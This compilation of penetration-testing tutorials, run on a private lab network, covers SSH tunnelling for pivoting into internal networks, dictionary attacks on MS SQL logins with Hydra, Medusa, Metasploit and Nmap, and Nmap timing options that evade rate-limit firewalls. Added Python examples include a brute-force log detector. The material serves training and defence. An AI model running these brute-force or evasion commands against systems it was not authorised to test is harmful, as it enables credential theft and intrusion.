Comprehensive Guide to SSH Tunnelling


Tunneling is a technique that carries the traffic of one network privately across another network. The private network's packets, protocol headers included, are encapsulated inside the packets of the public network, so the public network sees only opaque payload while the private protocol travels through it unchanged.
SSH Tunnel: When the carrier protocol is SSH, every encapsulated connection inherits SSH's encryption and authentication, and the public network sees nothing but an SSH session to port 22. Because the tunnelled traffic is repackaged (and encrypted) in transit, a tunnel also hides what kind of traffic is running through it, which is why it matters both to administrators and to attackers pivoting into a network.
Types of SSH Tunneling:     
1.      Dynamic SSH tunneling
2.      Local SSH tunneling
3.      Remote SSH tunneling
Let’s Begin!!
Objective:  To reach an SSH service on a host in a different (internal) network by tunneling through an SSH server that has a foothold in both networks.
Here I have set up a lab of three systems on the following networks:
SSH server "Ignite" (two Ethernet interfaces):
  • 192.168.1.104, reachable from the remote system
  • 192.168.10.1, connected to the local network where the SSH client 192.168.10.2 lives
SSH client "raj" (local network): 192.168.10.2
Remote system (outside network): 192.168.1.108; it can reach 192.168.1.104 but has no route to 192.168.10.0/24
The image below shows the SSH tunneling process: the remote PC wants to reach 192.168.10.2, which sits on the intranet of another network. To reach the SSH client (raj), the remote PC builds an SSH tunnel through the SSH server (Ignite), which relays the connection into the local network.
NOTE: The SSH service must be running on the server as well as on the client machine, and the remote PC needs an SSH account on the server.


The image below shows the network configuration of the SSH server, with its two addresses 192.168.1.104 and 192.168.10.1.



The next image shows the network configuration of the SSH client, which holds 192.168.10.2.


Dynamic SSH Tunneling through Windows

The remote PC connects to the SSH server (192.168.1.104) on port 22 and logs in successfully. Here we used PuTTY to connect the remote user (Windows) to the SSH server (Ubuntu).



When the remote PC then tries to connect directly to the client PC (192.168.10.2) on port 22, it gets a network error: the two machines are on different networks and the remote PC has no route to 192.168.10.0/24.


Steps for dynamic SSH tunneling
  • In PuTTY, choose Connection > SSH > Tunnels in the category tree on the left.
  • Enter 7000 as the source port, select Dynamic as the type and click Add.


Now set the host name to the SSH server 192.168.1.104, port 22, and click Open once everything is set.


PuTTY first connects to the SSH server; as you can see we are logged in to the SSH server (Ignite). For as long as this session stays open, PuTTY listens on 127.0.0.1:7000 as a SOCKS proxy whose connections exit on the server's side of the network.


Now start a second PuTTY session with the client system 192.168.10.2 as host name and port 22, but do not click Open yet.



In this new session choose Connection > Proxy in the category tree and follow the steps below:
  • Select proxy type SOCKS 5
  • Enter proxy hostname 127.0.0.1 and port 7000
  • Click Open to establish the connection.


Awesome!! We have successfully reached the SSH client (raj) through the SOCKS proxy on port 7000: the second session is carried inside the first.


Dynamic SSH Tunneling through Kali Linux
Now we use Kali Linux for SSH tunneling and show how an attacker or Linux user can take advantage of tunneling to reach the client system over SSH.

ssh -D 7000 ignite@192.168.1.104
Enter the user's password to log in to the SSH server, as shown below. The -D 7000 option makes ssh listen on 127.0.0.1:7000 as a SOCKS (version 4 and 5) proxy; every connection handed to it is carried through the SSH session and leaves from the server's side.


Next we need to point the web browser at that SOCKS proxy; in Firefox follow the steps below.

·         Open Settings, stay on the General tab and open Network Settings (Network Proxy).
·         Choose Manual proxy configuration.
·         Set SOCKS Host to 127.0.0.1, port 7000, and select SOCKS v5.
·         Leave localhost, 127.0.0.1 in the "No proxy for" list.
·         Tick "Proxy DNS when using SOCKS v5", otherwise host names are resolved on the Kali side instead of through the tunnel.


As the image below shows, we can now reach the client 192.168.10.2 on port 80 through the proxy.


Now we use the same tunnel to reach the client over SSH. If the earlier session has been closed, re-establish the dynamic tunnel to the SSH server with:

ssh -D 7000 ignite@192.168.1.104


Install tsocks from the apt repository with: apt install tsocks

tsocks is a library (loaded via LD_PRELOAD) that intercepts a program's outgoing network connections and redirects them through a SOCKS server, so programs with no proxy settings of their own, such as ssh, can use the tunnel.


Open /etc/tsocks.conf for editing and set the SOCKS server IP and port; in our case the following two lines are needed, then save the file:
server = 127.0.0.1
server_port = 7000


Now connect to the SSH client through tsocks with the command below; the target is the client's intranet address 192.168.10.2, which only the SSH server can reach:
tsocks ssh raj@192.168.10.2
Enter the password and enjoy the access to the SSH client.
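What Firefox and tsocks actually say to the listener that ssh -D opens is a SOCKS5 CONNECT handshake (RFC 1928). The following is an added example for this guide, not code from the original article or from OpenSSH: it builds and parses the handshake messages, opens a tunnelled TCP stream through any SOCKS5 proxy, and includes a stub proxy (a stand-in for the ssh -D listener) so that demo() runs offline. The addresses, the banner and the stub's "reachable" rule are constructed for illustration.

```python
"""SOCKS5 CONNECT handshake (RFC 1928), the exchange a browser or tsocks has
with the listener that `ssh -D 7000` opens on 127.0.0.1:7000. Added example
for this guide, not code from the original article or from OpenSSH: the
stub proxy used by demo() is a stand-in for the ssh -D listener, and the
byte strings and addresses are constructed for illustration."""
import socket
import struct
import threading

VER, CMD_CONNECT, ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x05, 0x01, 0x01, 0x03, 0x04
REPLY_TEXT = {0x00: "succeeded", 0x01: "general SOCKS server failure",
              0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
              0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
              0x07: "command not supported", 0x08: "address type not supported"}


def build_greeting() -> bytes:
    # VER=5, one offered method: 0x00 "no authentication", which is all ssh -D supports.
    return bytes([VER, 0x01, 0x00])


def build_connect(host: str, port: int) -> bytes:
    """CONNECT request. A dotted quad goes as ATYP 1; any other host goes as
    ATYP 3 so the proxy (i.e. the SSH server) resolves the name, which is what
    lets intranet names resolve and keeps DNS lookups off the attacker's box."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("host name too long for a SOCKS5 request")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([VER, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def read_reply(sock) -> tuple:
    """Parse VER REP RSV ATYP BND.ADDR BND.PORT; returns (rep, bound_addr, bound_port)."""
    ver, rep, _rsv, atyp = recv_exact(sock, 4)
    if ver != VER:
        raise ValueError(f"not a SOCKS5 reply (version byte {ver:#x})")
    if atyp == ATYP_IPV4:
        bound = socket.inet_ntoa(recv_exact(sock, 4))
    elif atyp == ATYP_DOMAIN:
        bound = recv_exact(sock, recv_exact(sock, 1)[0]).decode()
    elif atyp == ATYP_IPV6:
        bound = socket.inet_ntop(socket.AF_INET6, recv_exact(sock, 16))
    else:
        raise ValueError(f"unknown address type {atyp}")
    return rep, bound, struct.unpack("!H", recv_exact(sock, 2))[0]


def socks5_connect(proxy: tuple, dest_host: str, dest_port: int) -> socket.socket:
    """Return a TCP socket whose far end is dest, reached through the proxy."""
    sock = socket.create_connection(proxy, timeout=5)
    try:
        sock.sendall(build_greeting())
        ver, method = recv_exact(sock, 2)
        if ver != VER or method != 0x00:
            raise ConnectionError("proxy refused the no-authentication method")
        sock.sendall(build_connect(dest_host, dest_port))
        rep, _addr, _port = read_reply(sock)
        if rep != 0x00:
            raise ConnectionError(f"CONNECT {dest_host}:{dest_port}: {REPLY_TEXT.get(rep, rep)}")
        return sock
    except Exception:
        sock.close()
        raise


def _stub_proxy(listener, reachable):
    """Stand-in for the ssh -D listener: serves one client, grants CONNECT only
    to the `reachable` (host, port), answers REP 0x05 otherwise, then echoes once."""
    conn, _ = listener.accept()
    with conn:
        _ver, nmethods = recv_exact(conn, 2)
        recv_exact(conn, nmethods)
        conn.sendall(bytes([VER, 0x00]))
        _ver, _cmd, _rsv, atyp = recv_exact(conn, 4)
        host = (socket.inet_ntoa(recv_exact(conn, 4)) if atyp == ATYP_IPV4
                else recv_exact(conn, recv_exact(conn, 1)[0]).decode())
        port = struct.unpack("!H", recv_exact(conn, 2))[0]
        rep = 0x00 if (host, port) == reachable else 0x05
        conn.sendall(bytes([VER, rep, 0x00, ATYP_IPV4]) + socket.inet_aton("0.0.0.0") + struct.pack("!H", 0))
        if rep == 0x00:
            conn.sendall(conn.recv(64))


def demo(dest_host="192.168.10.2", dest_port=22) -> bytes:
    """Send a banner to dest through the stub proxy and return what comes back;
    raises ConnectionError when the proxy refuses the destination."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=_stub_proxy, args=(listener, ("192.168.10.2", 22)), daemon=True).start()
    try:
        with socks5_connect(listener.getsockname(), dest_host, dest_port) as s:
            s.sendall(b"SSH-2.0-probe\r\n")
            return recv_exact(s, 15)
    finally:
        listener.close()
```

Against a real tunnel, `socks5_connect(("127.0.0.1", 7000), "192.168.10.2", 22)` returns a socket on which the SSH banner of raj's machine arrives. The REP code is worth reading rather than ignoring: 0x05 from ssh -D means the SSH server itself could not connect to the destination, which tells you whether the problem is your proxy setup or the route from the server.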


Local SSH Tunneling through Windows
Local tunneling forwards one port on your own machine to a single fixed destination behind the SSH server. It lets you reach a specific machine that is not reachable from the Internet, such as the SSH client on the intranet.
The difference between dynamic and local tunneling is that dynamic tunneling exposes a SOCKS proxy through which any TCP destination can be reached, whereas local tunneling needs only the one destination address and port, given up front, and needs no proxy support in the application you use.

Step for SSH Local tunneling
·         Use PuTTY to connect to the SSH server (192.168.1.104) on port 22 and choose Connection > SSH > Tunnels in the category tree on the left.


·         Enter 7000 as the source port and choose Local as the type.
·         Enter 192.168.10.2:22 as the destination, to reach that specific client, and click Add.
·         Click Open when everything is set.


This first establishes the connection between the remote PC and the SSH server; PuTTY now listens on 127.0.0.1:7000 and hands everything that arrives there to the server, which connects it onward to 192.168.10.2:22.


Open a new PuTTY window and follow the steps below:
·         Enter localhost as host name, 7000 as port and SSH as connection type.
·         Click Open to establish the connection.


Awesome!! We have successfully reached the SSH client via port 7000.


Local SSH Tunneling through Kali Linux

Now we switch back to Kali Linux for local tunneling, which is simpler than dynamic tunneling. Run the command below to forward local port 7000 to the client's SSH port through the server:
ssh -L 7000:192.168.10.2:22 ignite@192.168.1.104


Now open a new terminal and run the command below to connect to the SSH client:
ssh raj@127.0.0.1 -p 7000
Awesome!! We have successfully reached the SSH client via port 7000. Note that the host key ssh shows you belongs to 192.168.10.2 even though you typed 127.0.0.1; it is stored in known_hosts under [127.0.0.1]:7000.


Remote SSH Tunneling through Putty

Remote tunneling works in the opposite direction: the SSH server opens a listening port on a remote system outside its network, and connections to that port are carried back to a host on the server's local network. It is useful when the machine that can reach the target cannot accept inbound connections but can connect outward.
First install PuTTY on the SSH server (Ignite) and follow the steps below.

Steps for remote tunneling
·         Enter the remote system IP 192.168.1.108 as host name
·         Enter port 22
·         Go to Connection > SSH > Tunnels



·         Enter 7000 as the source port and choose Remote as the type.
·         Enter 192.168.10.2:22 as the destination, to reach that specific client, and click Add.
·         Click Open when everything is set.


The server now connects to the remote system, as shown in the image below; from this point on, port 7000 on the remote system leads back to 192.168.10.2:22.


Go back to the remote system and run the following command to reach the SSH client machine:
ssh raj@127.0.0.1 -p 7000
As the image below shows, we have successfully connected to the SSH client machine via port 7000.


Remote SSH Tunneling through Command-Line
If you would rather not use PuTTY for remote tunneling, run the following command on the SSH server (the remote system must itself run an SSH service that accepts the login):
ssh -R 7000:192.168.10.2:22 root@192.168.1.108
Here 192.168.10.2 is the IP of our local client (raj) and 192.168.1.108 is the IP of the remote system. Port 7000 is opened on 192.168.1.108, on its loopback interface only unless GatewayPorts is enabled in that system's sshd_config.


Go back to the remote system and run the following command to reach the SSH client machine:
ssh raj@127.0.0.1 -p 7000
As the image below shows, we have successfully connected to the SSH client machine via port 7000.
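Both local and remote forwarding reduce to the same two parts: a forwarding spec of the form [bind_address:]port:host:hostport, and a relay that accepts on the listening side and connects to the fixed destination on the other side; the only difference between -L and -R is which end of the SSH session owns the listener. The following is an added example for this guide, not OpenSSH code or code from the original article. It validates the spec (catching the kind of five-octet typo that ssh would otherwise try to resolve as a host name) and runs the relay over loopback; the echo service in demo() stands in for sshd on the client, and the 127.0.0.1 default bind address stands in for ssh's "localhost" default.

```python
"""What `ssh -L 7000:192.168.10.2:22` and `ssh -R 7000:192.168.10.2:22` set
up, reduced to its two parts: a parser for OpenSSH's forwarding spec
([bind_address:]port:host:hostport) and a TCP relay that accepts on one
side and connects to the fixed destination on the other. Added example for
this guide, not OpenSSH code or code from the original article; the loopback
echo service in demo() stands in for the SSH client's port 22, and the
127.0.0.1 default bind address stands in for ssh's "localhost" default."""
import ipaddress
import socket
import threading


def parse_forward_spec(spec: str) -> dict:
    """Validate each field so a typo like 192.168.1.10.2 is caught before ssh
    goes off to resolve it as a host name."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = "127.0.0.1", *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"expected [bind_address:]port:host:hostport, got {spec!r}")
    for name, value in (("port", port), ("hostport", hostport)):
        if not value.isdigit() or not 1 <= int(value) <= 65535:
            raise ValueError(f"{name} must be 1-65535, got {value!r}")
    if host.replace(".", "").isdigit():     # all-numeric host: must be a well-formed IPv4 address
        ipaddress.IPv4Address(host)         # raises ValueError on 192.168.1.10.2, 256.1.1.1, ...
    return {"bind": bind, "port": int(port), "host": host, "hostport": int(hostport)}


def _pump(src, dst):
    """Copy bytes one way until src closes, then half-close dst."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve_forward(listener, target, max_conns=1):
    """The listening side of a forward. With -L this runs where ssh was started
    (the remote PC) and `target` is reached from the SSH server; with -R it runs
    on the system ssh connected to and the connection comes back through the
    tunnel. Either way each accepted connection gets its own pair of relays."""
    for _ in range(max_conns):
        client, _ = listener.accept()
        try:
            upstream = socket.create_connection(target, timeout=5)
        except OSError:
            client.close()          # ssh logs "connect failed" and keeps the listener up
            continue
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()


def _echo_target(srv):
    """Constructed stand-in for sshd on 192.168.10.2: banner plus echo, then close."""
    conn, _ = srv.accept()
    with conn:
        conn.sendall(b"SSH-2.0-OpenSSH_stub\r\n" + conn.recv(4096))


def demo() -> bytes:
    """Run a -L style forward over loopback and return what the far end sends back."""
    target = socket.socket()
    target.bind(("127.0.0.1", 0))
    target.listen(1)
    threading.Thread(target=_echo_target, args=(target,), daemon=True).start()
    fwd = parse_forward_spec(f"7000:127.0.0.1:{target.getsockname()[1]}")
    listener = socket.socket()
    listener.bind((fwd["bind"], 0))   # ephemeral port rather than 7000 so the demo cannot clash
    listener.listen(1)
    threading.Thread(target=serve_forward,
                     args=(listener, (fwd["host"], fwd["hostport"])), daemon=True).start()
    try:
        with socket.create_connection(listener.getsockname(), timeout=5) as s:
            s.sendall(b"SSH-2.0-probe\r\n")
            out = b""
            while chunk := s.recv(4096):
                out += chunk
            return out
    finally:
        listener.close()
        target.close()
```

The bind address is the part worth checking twice: a 3-field spec binds to loopback, so only the machine running the listener can use the forward; adding 0.0.0.0 in front (or GatewayPorts on the -R side) exposes the intranet host to everyone who can reach that port.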

4 ways to Hack MS SQL Login Password

In this article we will learn how to gain control over a victim's MS SQL Server login through port 1433, the port the MSSQL service listens on. There are several ways to do it; let's take the time to learn all of them, because different circumstances call for different measures.
Let's start!!
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases and much more.
Now we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command:
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s 1433 -t 16 192.168.1.128 mssql
-L: path of the username list (sa is the default administrative login of MSSQL)
-P: path of the password list
-s: port (1433 is the default for mssql, so it may be omitted)
-t: number of parallel connections

Once the command runs, it starts the dictionary attack and you will have the right password in no time. As you can observe, we successfully grabbed the MSSQL password apple@123456.

Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, MSSQL, HTTP, IMAP, rlogin, SSH and Subversion, to name a few.
Run the following command:
medusa -h 192.168.1.128 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
Here
-U: path of the username list (use -u for a single username; sa is the default login of MSSQL)
-P: path of the password list
-M: the module to use, here mssql
As you can observe, we successfully grabbed the MSSQL password apple@123456.

xHydra 
This is the graphical front end of Hydra, used here for a dictionary attack against port 1433. For this method to work:
Run xhydra from your Kali Linux terminal. Select Single Target and enter the IP of your victim PC, select mssql in the Protocol box and enter 1433 in the Port box.


Now go to the Passwords tab, select Password List and enter the path of the text file containing your passwords in the box next to it.


After that, go to the Start tab and click the Start button on the left.
The dictionary attack now runs, and you obtain the username sa and the password of your victim.


Metasploit


This module simply tries to log in to the MSSQL instance with each user/pass combination (the default is sa with a blank password).
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run
Awesome!! As the image below shows, Metasploit found the same password, apple@123456.

NMAP

The command below attempts to determine the username and password by a brute-force attack against MS SQL Server using the username and password dictionaries:
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128
In the image you can observe that we successfully retrieved the credentials: username sa and password apple@123456.
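Every one of the four tools above leaves the same trace on the target: a burst of failed logins (error 18456) from one client address in SQL Server's ERRORLOG, typically with State 8 (wrong password) or State 5 (no such login). The following is an added example for this article, not code from the original: it parses such lines and raises an alert when one client crosses a failure threshold inside a sliding window. The ERRORLOG excerpt is constructed to follow the layout SQL Server writes for failed logins, and the threshold and window are assumptions to tune per environment.

```python
"""Detection for the dictionary attacks above, seen from the SQL Server
side: count failed logins (error 18456) per client address in a sliding
window and raise an alert when a threshold is crossed. Added example for
this article, not code from the original. The ERRORLOG excerpt below is
constructed to follow the layout SQL Server writes for failed logins
(an "Error: 18456, Severity: 14, State: N." line followed by a
"Login failed for user '...'. Reason: ... [CLIENT: a.b.c.d]" line);
the threshold and window are assumptions to tune per environment."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Only the "Login failed" line carries the user name and client address.
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.+?)\s*"
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)

WRONG_PW = "Password did not match that for the login provided."   # State 8
NO_LOGIN = "Could not find a login matching the name provided."     # State 5

# Constructed sample: one burst from 192.168.1.126 (a Hydra/Medusa run
# cycling through sa and raj) and one stray failure from 192.168.1.50.
SAMPLE_ERRORLOG = f"""\
2024-03-02 10:15:01.12 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-02 10:15:01.12 Logon       Login failed for user 'sa'. Reason: {WRONG_PW} [CLIENT: 192.168.1.126]
2024-03-02 10:15:01.18 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-02 10:15:01.18 Logon       Login failed for user 'sa'. Reason: {WRONG_PW} [CLIENT: 192.168.1.126]
2024-03-02 10:15:01.25 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-02 10:15:01.25 Logon       Login failed for user 'sa'. Reason: {WRONG_PW} [CLIENT: 192.168.1.126]
2024-03-02 10:15:01.31 Logon       Error: 18456, Severity: 14, State: 5.
2024-03-02 10:15:01.31 Logon       Login failed for user 'raj'. Reason: {NO_LOGIN} [CLIENT: 192.168.1.126]
2024-03-02 10:15:01.37 Logon       Error: 18456, Severity: 14, State: 5.
2024-03-02 10:15:01.37 Logon       Login failed for user 'raj'. Reason: {NO_LOGIN} [CLIENT: 192.168.1.126]
2024-03-02 10:15:01.44 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-02 10:15:01.44 Logon       Login failed for user 'sa'. Reason: {WRONG_PW} [CLIENT: 192.168.1.126]
2024-03-02 10:15:05.40 Logon       Error: 18456, Severity: 14, State: 8.
2024-03-02 10:15:05.40 Logon       Login failed for user 'sa'. Reason: {WRONG_PW} [CLIENT: 192.168.1.50]
"""


def parse_failed_logins(text: str) -> list:
    """Return one dict per 'Login failed' line, in file order."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGIN.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           "user": m["user"], "reason": m["reason"], "client": m["client"]})
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)) -> dict:
    """Sliding window per client address. Returns {client: summary} for every
    client that reached `threshold` failures inside `window`; the summary
    lists the user names tried, which separates a spray over many logins
    from a single user mistyping a password."""
    recent = defaultdict(deque)
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        q = recent[ev["client"]]
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[ev["client"]] = {"count": len(q),
                                    "users": sorted({e["user"] for e in q}),
                                    "first": q[0]["ts"], "last": ev["ts"]}
    return alerts


if __name__ == "__main__":
    for client, a in detect_bruteforce(parse_failed_logins(SAMPLE_ERRORLOG)).items():
        print(f"ALERT {client}: {a['count']} failures between {a['first']:%H:%M:%S} "
              f"and {a['last']:%H:%M:%S}, users tried: {a['users']}")
```

These lines only exist if login auditing is enabled for failed logins (the instance default), and the Hydra command above with -t 16 produces them faster than one per second, so even a low threshold catches it; a slow spray spread over hours needs a longer window and, more usefully, a count of distinct user names per client.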

Nmap Scan with Timing Parameters


Hello everyone, in this article we will look at the different parameters that together make up an Nmap timing template, and at how to use those parameters individually as required.
Let's start!!
Nmap timing template
As we have seen, Nmap has several timing templates (-T0 to -T5) that can be chosen according to the requirement (see the timing scan article). Let's see what is inside a timing template. To get its description we use the -d (debug) option, which prints the values the template sets:
nmap -T4 -d -p21-25 192.168.1.139
Here we have several parameters that collectively make a timing template. Let's look at them one by one.
·         Host groups
·         RTT timeouts
·         Scan delay
·         Max retries
·         Min/max rate
·         Parallelism



Maximum Retries (--max-retries)
--max-retries specifies how many times a probe is resent to a port when no reply comes back, before Nmap gives up on determining whether that port is open or closed. With --max-retries 0 each port is probed exactly once and nothing is retried.
nmap -p21-25 192.168.1.139 --max-retries 0


In Wireshark we can see one TCP SYN packet sent to each port from source 192.168.1.126 to destination 192.168.1.139, and none of them is sent again.


Now we apply a small firewall rule set on the target machine so that packets are dropped when they arrive from the same source faster than one per second. Because -I inserts at the top of the chain, the DROP rule (inserted second) is evaluated first: a new TCP connection from an address seen within the last second is dropped and the address's timestamp is refreshed; otherwise the --set rule records the address and the packet passes.
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set
sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP


Now the same scan with --max-retries 0 no longer gives a result for most ports:

nmap -p21-25 192.168.1.139 --max-retries 0


As we can see, the probes that were dropped are not sent again, so the state of those ports cannot be determined and Nmap reports them as filtered.


Here we can raise the max-retries value; the later retries are spaced further apart, so some of them get past the rate limit and we obtain the real port status.
nmap -p21-25 192.168.1.139 --max-retries 5


Here we can see that TCP SYN packets to the same port from source 192.168.1.126 to destination 192.168.1.139 are sent again and again until a reply comes back or the maximum retry count (here 5) is reached.
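Why retries 0 fails and retries 5 succeeds against those two rules, and why spacing the probes out works just as well, is easiest to see with a small model. The following is an added example for this article, not Nmap code or code from the original post: RecentFilter implements the documented semantics of the two iptables recent rules (drop a NEW packet from an address that was seen within the window, recording every packet's timestamp either way), and scan() applies a constructed probe schedule in which retry rounds are spaced further and further apart, standing in for Nmap's real timeout back-off. Port numbers and timings are constructed.

```python
"""Model of the two iptables `recent` rules above and of how Nmap's probe
timing interacts with them. Added example for this article, not Nmap code
or code from the original post: RecentFilter implements the documented
rule semantics (drop a NEW packet from an address seen within `seconds`
at least `hitcount` times, recording every packet's timestamp either way);
scan() uses a constructed schedule in which retry rounds are spaced
further and further apart, standing in for Nmap's real timeout back-off."""
from collections import deque


class RecentFilter:
    """`-m recent --update --seconds S --hitcount N -j DROP` followed by
    `-m recent --set`, for a single source address."""

    def __init__(self, seconds=1.0, hitcount=1, list_len=20):
        self.seconds = seconds
        self.hitcount = hitcount
        self.hits = deque(maxlen=list_len)   # the module keeps the last 20 timestamps per address by default

    def accept(self, t: float) -> bool:
        """True if a NEW packet arriving at time t passes, False if it is dropped.
        Dropped packets still refresh the entry (that is what --update does), so
        a constant stream faster than one per second stays locked out entirely."""
        in_window = sum(1 for h in self.hits if t - h <= self.seconds)
        self.hits.append(t)
        return in_window < self.hitcount


def scan(ports, max_retries, probe_gap=0.01, round_wait=1.5, firewall=None):
    """Probe each port once per round, `probe_gap` seconds apart (a burst, as
    with default timing), then wait `round_wait` times the round number before
    retrying the unanswered ports, for up to max_retries extra rounds.
    Returns ({port: round in which its state was determined}, [still unknown])."""
    fw = firewall or RecentFilter()
    t = 0.0
    pending = list(ports)
    determined = {}
    for attempt in range(max_retries + 1):
        for port in list(pending):
            if fw.accept(t):               # SYN reaches the stack: a SYN/ACK or RST comes back
                determined[port] = attempt
                pending.remove(port)
            t += probe_gap
        if not pending:
            break
        t += round_wait * (attempt + 1)    # assumption: retries back off, like Nmap's rtt timeout
    return determined, pending


if __name__ == "__main__":
    ports = [21, 22, 23, 24, 25]
    print("--max-retries 0  :", scan(ports, max_retries=0))
    print("--max-retries 5  :", scan(ports, max_retries=5))
    print("--scan-delay 1.1s:", scan(ports, max_retries=0, probe_gap=1.1))
```

With the burst schedule only the first probe of each round gets through, so each extra retry round recovers exactly one more port, which is why five ports need --max-retries 4 or more here; with a gap of 1.1 s between probes (the --scan-delay discussed further down) every probe passes on the first attempt. Raising --hitcount on the firewall side lets a few packets per second through before the drop kicks in, and the model handles that too.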


Host-timeout
--host-timeout tells Nmap to give up on a host after the specified time. The shorter the time, the higher the chance of incomplete or inaccurate scan results.
Time can be given in milliseconds (ms), seconds (s) or minutes (m):
nmap -p21-25 192.168.1.139 --host-timeout 10ms


Now we try to get a result by increasing the timeout value:
nmap -p21-25 192.168.1.139 --host-timeout 100ms


--host-timeout is useful in other scenarios too, for instance when we only need to check whether a host is up. Here we show how the host timeout affects the result of a ping scan (-sn, formerly -sP):
nmap -sn 192.168.1.139 --host-timeout 10ms
The command above reported 0 hosts up.
nmap -sn 192.168.1.139 --host-timeout 100ms
The command above reported 1 host up.


Hostgroup

The hostgroup options control how many hosts Nmap scans in parallel as one group; you can specify a minimum, a maximum, or both:
nmap -sn 192.168.1.1/24 --min-hostgroup 3 --max-hostgroup 3
In the image below you can see the result of the first group of 3 hosts: Nmap works through the subnet three hosts at a time and prints each group's results as soon as that group is done, so you get the first live hosts without waiting for the whole network to finish.


Scan delay
--scan-delay makes Nmap wait at least the specified time between the probes it sends to a target. It is very useful for evading rate-based firewall rules and IDS thresholds:
nmap -p21-25 192.168.1.139 --scan-delay 11s


Here we can see the time difference between the packets:

packet 1: TCP SYN packet to port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139


packet 2: TCP SYN packet to port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139
If you work out the time difference between these packets you get an 11 s gap between them.


Maximum rate (--max-rate)

The rate options specify how many probe packets per second Nmap sends. --max-rate caps the sending rate at the given number of packets per second:

nmap -p21-25 192.168.1.139 --max-rate 2


Wireshark shows that the packets are sent at no more than 2 per second:
packet 1: TCP SYN packet to port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139


packet 2: TCP SYN packet to port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139
If you work out the time difference between these packets you get a 1 s gap, indicating that they were not sent together.


Minimum rate (--min-rate)

--min-rate sets the minimum number of packets per second. If we want at least 2 packets per second sent to the target, and no fewer, we run:
nmap -p21-25 192.168.1.139 --min-rate 2


Wireshark shows that the packets are sent at 2 or more per second:

packet 1: TCP SYN packet to port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139


packet 2: TCP SYN packet to port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139
If you work out the time difference between these packets you get only a fraction of a second, indicating that they were sent together.


Parallelism
The parallelism options control how many probes may be outstanding at the same time: --min-parallelism means at least that many probes are in flight in parallel, and --max-parallelism means at most that many. Setting both to the same value pins the number:
nmap -p21-25 192.168.1.139 --min-parallelism 2 --max-parallelism 2


In Wireshark we can see pairs of TCP SYN packets sent in parallel from 192.168.1.126, neither fewer nor more than 2 at a time.


Round trip timeout
The RTT timeout is how long Nmap waits for a probe's reply before treating the probe as lost. Nmap adjusts this timeout from the round-trip times it observes; --min-rtt-timeout is the lowest value that adaptive timeout may take:
nmap -p21-25 192.168.1.139 --min-rtt-timeout 5ms


Wireshark shows the reply arriving about 0.8 ms after the probe, well inside the 5 ms minimum timeout, so it is accepted:
packet 1: TCP SYN packet to port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139


packet 2: SYN/ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126


Max-rtt-timeout
--max-rtt-timeout is the upper bound for that adaptive wait; a reply arriving later than this is treated as lost and the probe is retried:
nmap -p21-25 192.168.1.139 --max-rtt-timeout 50ms


Wireshark shows the reply arriving about 1.3 ms after the probe, well inside the 50 ms maximum timeout:

packet 1: TCP SYN packet to port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139


